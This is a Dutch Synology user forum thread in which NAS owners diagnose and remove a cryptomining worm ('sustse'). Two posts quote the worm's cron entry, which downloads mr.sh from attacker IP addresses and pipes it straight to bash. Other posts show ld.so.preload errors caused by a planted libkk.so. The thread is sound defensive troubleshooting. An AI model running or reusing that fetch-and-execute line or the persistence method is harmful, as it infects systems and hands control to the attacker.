Auteur Topic: Process 'sustse' gebruikt volledige processor  (gelezen 9626 keer)

Offline mbomhof

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 4
  • Berichten: 18
Process 'sustse' gebruikt volledige processor
« Gepost op: 13 juni 2019, 17:47:53 »
Hi all,

sinds vanmorgen is het me opgevallen dat een voor mij onbekend proces de processor van mijn DS216+II volledig belast.

  PID USER      PR  NI    VIRT    RES  %CPU %MEM     TIME+ S COMMAND
 1974 root      20   0  262.1m   5.0m 182.2  0.6   0:40.36 S /var/tmp/sustse -c /var/tmp/wc.conf

Het killen van dit proces helpt en de processor wordt weer rustig.
Echter komt dit proces na een paar minuten weer terug.
Het verwijderen van 'sustse' en de config 'wc.conf' heeft geen effect, ook deze komen weer terug.

Een aantal zoekacties op Google levert me dit op, maar ik kan er geen wijs uit worden:
https://gist.github.com/5shekel/b54824ebd6be4bd75442e1480d5f68b2
https://www.digitalocean.com/community/questions/what-is-this-sustes-in-my-process-in-my-cpu-stats

Cronjobs als beschreven kan ik niet terug vinden...

Maar het lijkt er op dat mijn NAS als een of andere miner staat te stampen.
Niet waar ik hem graag voor wil inzetten en zeker niet door mij ingesteld.

Wie kan mij helpen dit proces voor eens en voor altijd te killen...?

  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline mbomhof

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 4
  • Berichten: 18
Re: Process 'sustse' gebruikt volledige processor
« Reactie #1 Gepost op: 13 juni 2019, 18:16:36 »
Aanvulling:

op de locatie /etc/cron.hourly/ vind ik een bestand met de naam 'oanacroner1'.

met daarin de volgende regel:
(curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh

Het verwijderen van dit bestand heeft ook geen effect, komt na een paar minuten terug...
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 10
  • -Ontvangen: 1457
  • Berichten: 6.103
Re: Process 'sustse' gebruikt volledige processor
« Reactie #2 Gepost op: 13 juni 2019, 18:30:16 »
Je NAS is dus geïnfecteerd met malware. Ik zou een backup maken van je data en de NAS volledig opnieuw inrichten.

Offline mbomhof

  • Bedankjes
  • -Gegeven: 2
  • -Ontvangen: 4
  • Berichten: 18
Re: Process 'sustse' gebruikt volledige processor
« Reactie #3 Gepost op: 13 juni 2019, 18:57:18 »
Dank voor de reactie.
Aangezien ik aardig wat draai op mijn NAS en ik er ook behoorlijk wat data op heb staan dat ik niet direct ergens anders kan opslaan, heeft dit natuurlijk niet mijn voorkeur.

Ik heb momenteel het ip adres in het bestand 'oanacroner1' in mijn firewall geblokkeerd en voorlopig zie ik het proces niet terug komen.

Ook heb ik het bestand verwijderd alsmede de bestanden /var/tmp/sustse en /var/tmp/wc.conf.
Ook die komen momenteel niet terug.

Mogelijk hiermee de tijd gewonnen om toch eens verder te zoeken naar een oplossing anders dan opnieuw inrichten...
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline DSGebruiker

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 5
  • -Ontvangen: 119
  • Berichten: 761
Re: Process 'sustse' gebruikt volledige processor
« Reactie #4 Gepost op: 13 juni 2019, 19:31:29 »
Behoorlijk onrustwekkend dat op je NAS er malware is *kunnen* geinstalleerd worden !

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 180
  • -Ontvangen: 2680
  • Berichten: 16.584
Re: Process 'sustse' gebruikt volledige processor
« Reactie #5 Gepost op: 13 juni 2019, 19:42:42 »
Aangezien ik aardig wat draai op mijn NAS en ik er ook behoorlijk wat data op heb staan dat ik niet direct ergens anders kan opslaan, heeft dit natuurlijk niet mijn voorkeur.

Op zich zal het opnieuw installeren van dsm, van de data op shares afblijven. De kans is dan redelijk dan je de miner kwijt raakt. Maar het blijft vervelend als je niet weet hoe de infectie is gestart. Dan kan het zo weer gebeuren. Staat ssh of telnet open? Dan zou je ook in het "bash_history.log" kunnen zoeken rond het moment van besmetting. (/var/log/bash_history.log)
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J, RT1900ac

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 32
  • Berichten: 247
Re: Process 'sustse' gebruikt volledige processor
« Reactie #6 Gepost op: 14 juni 2019, 10:08:57 »
[Mod edit: Vanaf hier uit een ander topic toegevoegd omdat dit over hetzelfde probleem blijkt te gaan]

Als ik inlog via SSH (met Putty), en wanneer ik commando's ingeef, krijg ik de volgende foutmelding:

ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.

Als ik naar de betreffende directory ga dan tref ik het bestand libkk.so niet aan.

Af en toe krijg ik ook deze melding:

ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (file too short): ignored.
(net een andere melding)

of deze:

ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.

Ik vermoed dat het te maken heeft met de recente update van PHP5.6 (aangezien dat één van de weinige wijzigingen is geweest), maar wellicht is het ernstiger.

Iemand die bekend is met deze foutmelding?
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1399
  • -Ontvangen: 8046
  • Berichten: 44.176
  • Fijne feestdagen.......
    • Truebase
Re: Process 'sustse' gebruikt volledige processor
« Reactie #7 Gepost op: 14 juni 2019, 10:37:54 »
Verwacht niet dat dit door een update komt dus, het zou wel eens ernstig kunnen zijn, zoals een virus/worm.
Denk dat je even moet Googlen op die fout meldingen.
Ze komen weinig voor.

Overweging: DSM herinstalleren.


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-8   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-8
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-8   DS220+    DSM 7.2.2-72806-2
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-2   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.2-65567                                                                 MR2200ac  SRM 1.3.1-9346-12

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 180
  • -Ontvangen: 2680
  • Berichten: 16.584
Re: Process 'sustse' gebruikt volledige processor
« Reactie #8 Gepost op: 14 juni 2019, 11:32:27 »
Kwaadaardige software rommelt wel vaker met SSH.

Toevallig kwam ik deze vandaag tegen. Daar installeert kwaadaardige software, via een recent lek in een mailserver een ssh key zodat ze via ssh kunnen inloggen met rootrechten. Dat is via een Exim server en niet via postfix die Synology gebruikt voor Mailserver. (Ik weet niet waar mailserver plus op gebaseerd is. (Edit: geen Exim volgens Synology))

In elk geval reden om toch op korte termijn in jouw foutmelding te duiken.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J, RT1900ac

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 32
  • Berichten: 247
Re: Process 'sustse' gebruikt volledige processor
« Reactie #9 Gepost op: 14 juni 2019, 13:49:52 »
Dat klinkt allemaal niet hoopgevend. Ik heb geen mailserver draaien, dus ik hoop dat ik die kan wegstrepen.

Saillant detail: AntiVirus is nu al meer dan een dag aan het initialiseren, dus scannen lukt ook niet op dit moment...

Ik kijk even waar Synology Support mee komt.
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 32
  • Berichten: 247
Re: Process 'sustse' gebruikt volledige processor
« Reactie #10 Gepost op: 14 juni 2019, 14:03:35 »
Toch even gaan kijken. Dit stond in /etc/cron.d/root

*/1 * * * * root (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh
##

En hetzelfde in een bestand genaamd oanacroner1 in /etc/cron.hourly/

Worm dus. Ik heb deze bestanden verwijderd.

Nog meer acties nodig, voor zover bekend?
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1399
  • -Ontvangen: 8046
  • Berichten: 44.176
  • Fijne feestdagen.......
    • Truebase
Re: Process 'sustse' gebruikt volledige processor
« Reactie #11 Gepost op: 14 juni 2019, 14:27:13 »
Ligt eraan wat mr.sh allemaal doet, dus geen idee.
Maar het SSH inloggen zal nog we fouten opleveren?


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-8   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-8
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-8   DS220+    DSM 7.2.2-72806-2
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-2   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.2-65567                                                                 MR2200ac  SRM 1.3.1-9346-12

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 32
  • Berichten: 247
Re: Process 'sustse' gebruikt volledige processor
« Reactie #12 Gepost op: 14 juni 2019, 14:28:42 »
Ja, nog steeds dezelfde fouten. Maar AntiVirus werkt weer, dus eerst maar even een system scan.
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX

Offline Pippin

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 103
  • -Ontvangen: 529
  • Berichten: 2.724
  • a.k.a. MMD
Re: Process 'sustse' gebruikt volledige processor
« Reactie #13 Gepost op: 14 juni 2019, 14:36:58 »
Haal de NAS van het netwerk af en zoek eens op "sustes".

Vraag je af hoe het op je NAS gekomen is.....
DS414
OpenVPN #1: Beter beveiligen OpenVPN #2: Beter beveiligen als client

I gloomily came to the ironic conclusion that if you take a highly intelligent person and give them the best possible, elite education, then you will most likely wind up with an academic who is completely impervious to reality.
Halton Arp

Offline mc_

  • Bedankjes
  • -Gegeven: 12
  • -Ontvangen: 32
  • Berichten: 247
Re: Process 'sustse' gebruikt volledige processor
« Reactie #14 Gepost op: 14 juni 2019, 14:45:22 »
Ik heb inmiddels deze gevonden:

https://www.domoticz.com/forum/viewtopic.php?f=6&t=28329

Kan niet anders dan dit het is. Ik heb de meeste voorgestelde stappen gevolgd (niet alles lukt of tref ik aan).

De foutmelding is weg, maar nog even goed napluizen wat er eventueel nog achtergebleven kan zijn.

Iemand toevallig een step-by-step guide liggen hoe Domoticz als niet-root gebruiker te draaien?

EDIT: vraag is natuurlijk hoe Domoticz te draaien zonder root, niet Synology  ::)
  • Mijn Synology: DS1520+
  • HDD's: WD80EDAZ/WD40EFRX


 

Download Speed and process priority conflict

Gestart door adsboelBoard SABnzbd (usenet)

Reacties: 4
Gelezen: 4588
Laatste bericht 26 maart 2008, 15:48:13
door adsboel
CPU facerecognition process

Gestart door erniekenBoard Synology DSM 5.1 en eerder

Reacties: 5
Gelezen: 6849
Laatste bericht 16 juli 2012, 19:21:21
door ernieken
Post-process-script Failure

Gestart door Chris12Board NZBGet

Reacties: 3
Gelezen: 5484
Laatste bericht 15 december 2014, 20:58:37
door Birdy
VERPLAATST: 100% CPU nginx: worker process

Gestart door BirdyBoard Synology Router

Reacties: 0
Gelezen: 736
Laatste bericht 11 maart 2021, 10:13:24
door Birdy
Process gebruik raid 5 of shr

Gestart door spikehomeBoard NAS hardware vragen

Reacties: 1
Gelezen: 1408
Laatste bericht 27 januari 2012, 09:27:50
door spikehome